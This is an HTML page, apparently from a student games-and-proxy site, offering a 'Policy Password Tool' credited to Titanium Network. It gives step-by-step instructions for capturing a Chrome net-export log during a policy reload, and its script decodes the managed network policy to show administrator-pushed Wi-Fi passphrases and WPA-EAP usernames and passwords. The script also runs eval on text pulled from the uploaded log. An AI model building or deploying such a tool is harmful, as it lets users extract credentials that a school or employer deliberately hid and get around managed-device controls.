<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <title>Policy Password Tool</title>
    <style>
        body {
            margin: 0;
            font-family: Arial, sans-serif;
            color: white;
            text-align: center;
            background-color: #000;
        }

        header {
            background-color: rgba(0,0,0,0.8);
            padding: 10px 0;
            position: fixed;
            width: 100%;
            top: 0;
            z-index: 1000;
        }

        .nav-list {
            list-style: none;
            display: flex;
            justify-content: center;
            padding: 0;
            margin: 0;
            flex-wrap: wrap;
        }

        .nav-list li {
            margin: 0 10px;
        }

        .nav-list a {
            color: white;
            text-decoration: none;
            font-weight: bold;
            font-size: 16px;
        }

        .nav-list a:hover {
            color: #0284d4;
            text-decoration: underline;
        }

        td, th {
            border: 1px solid #000;
            background: #111;
        }

        #log {
            font-family: "Courier";
            text-align: left;
        }

        main {
            margin-top: 100px; /* space for header */
        }
    </style>
</head>
<body>
  <header>
    <nav>
      <ul class="nav-list">
        <li><a href="index.html">Home</a></li>
        <li><a href="https://google.com">⚠️Panic⚠️</a></li>
        <li><a href="gxmes.html">Gxmes/Experiences</a></li>
        <li><a href="apps-testing.html">Apps</a></li>
        <li><a href="discord.html">Onsite Discord</a></li>
        <li><a href="special-thanks.html">Special Thanks/Cool People</a></li>
        <li><a href="other-links.html">Other Links</a></li>
        <li><a href="new-ideas.html">New Ideas</a></li>
        <li><a href="report-problem.html">Report a Problem</a></li>
        <li><a href="about-rocky.html">About Rocky</a></li>
      </ul>
    </nav>
  </header>

  <main>
    <h1>Policy Password Tool</h1>
    <p>
        <i>This tool should not be used for illegal activity. By using this tool, you acknowledge that you are legally allowed to extract the password(s) in question.</i>
        <br><br>
        <b>Upload chrome-net-export-log.json - </b>
        <input type="file" id="export" />
        <br>
        <table id="output-networks">
            <tr>
                <th>SSID</th>
                <th>Credentials</th>
                <th>Security</th>
                <th>HiddenSSID</th>
            </tr>
        </table>
    </p>

    <h2>How to use</h2>
    <p>
        - Visit <code>chrome://net-export</code><br>
        - In "OPTIONS" set "Include raw bytes"<br>
        - Click "Start Logging to Disk"<br>
        - Visit <code>chrome://policy</code><br>
        - Click "Reload policies"<br>
        - Go back to <code>chrome://net-export</code> and click "Stop logging"<br>
        - Upload file here :)
    </p>

    <div id="log"></div>
    <br><br><br>
    <p style="text-align:right">
        CREDS TO TITANIUM NETWORK<br>
        <i>~ raider</i>
    </p>
  </main>

  <script>
    let log = (txt) => {
      console.log(txt);
      document.getElementById("log").innerText += txt + "\n";
    }

    let extract = (event) => {
      let file = event.target.files[0];
      let reader = new FileReader();
      reader.readAsText(file);
      reader.onload = (e) => {
        let netlog = e.target.result;
        let split_netlog = netlog.split("\n");
        let policyNets = [];
        for (let i = 0; i < split_netlog.length; i++) {
          if (split_netlog[i].includes("ya0NvbmZpZ3VyYXRpb2") || split_netlog[i].includes("vcmtDb25maWd1cmF0aW") || split_netlog[i].includes("rQ29uZmlndXJhdGlvbn") || split_netlog[i].includes("Db25maWd1cmF0aW9ucw")) {
            log(i);
            policyNets.push(split_netlog[i]);
          }
        }
        policyNets.forEach(policyNet => {
          try {
            policyNet = atob(policyNet.substring((policyNet.indexOf('"bytes":"') + 9), (policyNet.indexOf('"},"phase"'))));
            log(policyNet);
            let NetworkConfigurations = policyNet.substring(policyNet.indexOf('"NetworkConfigurations":'), policyNet.indexOf("]\n}b")) + "]";
            NetworkConfigurations = NetworkConfigurations.substring(0, NetworkConfigurations.search(/}\n *]/));
            NetworkConfigurations = NetworkConfigurations.replace(/("NetworkConfigurations":|\n)/g, "") + "}]";
            log(NetworkConfigurations);
            eval("NetworkConfigurations = " + NetworkConfigurations);
            for (wifi in NetworkConfigurations) {
              log(NetworkConfigurations[wifi]);
              let tr = document.createElement("tr");
              let SSID = document.createElement("td");
              SSID.innerText = NetworkConfigurations[wifi]["WiFi"]["SSID"];
              let Security = document.createElement("td");
              Security.innerText = NetworkConfigurations[wifi]["WiFi"]["Security"];
              let Passphrase = document.createElement("td");
              if (NetworkConfigurations[wifi]["WiFi"]["Passphrase"]) {
                Passphrase.innerText = NetworkConfigurations[wifi]["WiFi"]["Passphrase"]
              } else if (Security.innerText == "WPA-EAP" && NetworkConfigurations[wifi]["WiFi"]["EAP"]["Password"]) {
                Passphrase.innerText = "Identity: " + NetworkConfigurations[wifi]["WiFi"]["EAP"]["Identity"] + "\nPassword: " + NetworkConfigurations[wifi]["WiFi"]["EAP"]["Password"];
              } else Passphrase.innerText = "NOT FOUND";
              let HiddenSSID = document.createElement("td");
              HiddenSSID.innerText = NetworkConfigurations[wifi]["WiFi"]["HiddenSSID"];
              tr.appendChild(SSID);
              tr.appendChild(Passphrase);
              tr.appendChild(Security);
              tr.appendChild(HiddenSSID);
              document.getElementById("output-networks").appendChild(tr);
            }
          } catch (err) {
            log(err);
          }
        });
      }
    }
    document.getElementById("export").addEventListener("change", extract);
  </script>
</body>
</html>
